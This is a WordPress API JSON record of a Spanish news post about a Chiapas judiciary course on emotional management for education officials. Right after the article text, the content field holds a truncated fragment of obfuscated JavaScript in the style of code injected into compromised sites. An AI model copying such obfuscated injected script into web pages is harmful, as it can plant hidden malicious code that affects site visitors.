{"id":22076,"date":"2025-05-24T05:02:10","date_gmt":"2025-05-24T05:02:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22076"},"modified":"2025-05-24T05:08:41","modified_gmt":"2025-05-24T05:08:41","slug":"imparte-poder-judicial-curso-manejo-de-emociones-en-el-ambito-laboral-a-integrantes-de-la-secretaria-de-educacion-nivel-telesecundaria","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22076","title":{"rendered":"Imparte Poder Judicial curso Manejo de Emociones en el \u00c1mbito Laboral a integrantes de la Secretar\u00eda de Educaci\u00f3n nivel Telesecundaria"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250523-WA0020-1024x678.jpg\" alt=\"\" class=\"wp-image-22077\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250523-WA0020-1024x678.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250523-WA0020-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250523-WA0020-768x509.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250523-WA0020-1536x1017.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250523-WA0020-2048x1356.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250523-WA0020-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>23 de mayo del 2025. El Poder Judicial del Estado de Chiapas, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial (IFPyCJ) imparti\u00f3 de manera presencial el curso \u201cManejo de Emociones en el \u00c1mbito Laboral\u201d, a las y los l\u00edderes y jefes de sector de nivel Telesecundaria de la Secretar\u00eda de Educaci\u00f3n del Estado.<\/p>\n\n\n\n<p>Este curso, que se realiz\u00f3 en el Aula Magna del edificio \u201cC\u201d, fue impartido por la psic\u00f3loga adscrita al Centro de Convivencia Familiar (Cecofam), Mar\u00eda de Lourdes Meza \u00c1lvarez, con la asistencia de alrededor de 50 servidoras y servidores de la Secretar\u00eda de Educaci\u00f3n del Estado, con el objetivo de fortalecer, a trav\u00e9s de diversas actividades, el reconocimiento de las emociones propias y ajenas, para fomentar un ambiente laboral saludable y productivo.<\/p>\n\n\n\n<p>Durante el acto de inauguraci\u00f3n, el director del IFPyCJ, Jos\u00e9 Luis Baltazar Arg\u00fcello, junto al jefe de departamento de Telesecundaria, C\u00e9sar Antonio D\u00edaz Moreno, ofreci\u00f3 una calurosa bienvenida a la casa de la justicia a las y los asistentes. Asimismo, asever\u00f3 que cuando las instituciones trabajan de la mano, se acercan a\u00fan m\u00e1s al objetivo en com\u00fan, fortalecer a Chiapas.<\/p>\n\n\n\n<p>Al clausurar el evento, el subsecretario de Educaci\u00f3n, Gilberto de los Santos, agradeci\u00f3 al magistrado presidente Juan Carlos Moreno Guill\u00e9n, en nombre del secretario de Educaci\u00f3n, Roger Adri\u00e1n Mandujano, por el trabajo interinstitucional para coadyuvar en la formaci\u00f3n de las y los maestros, as\u00ed como de las y los j\u00f3venes estudiantes de la entidad.<\/p>\n\n\n\n<p>Con estas acciones, el Poder Judicial del Estado reafirma su compromiso con la capacitaci\u00f3n no solo de las y los operadores del sistema judicial, sino con los diversos grupos sociales del estado, a fin de abonar en la construcci\u00f3n de una nueva era en la administraci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 23 de mayo del 2025. El Poder Judicial del Estado de Chiapas, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial (IFPyCJ) imparti\u00f3 de manera presencial el curso \u201cManejo de Emociones en el \u00c1mbito Laboral\u201d, a las y los l\u00edderes y jefes de sector de nivel Telesecundaria de la Secretar\u00eda de Educaci\u00f3n del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22077,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22076","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22076","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22076"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22076\/revisions"}],"predecessor-version":[{"id":22078,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22076\/revisions\/22078"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22077"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22076"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22076"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22076"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}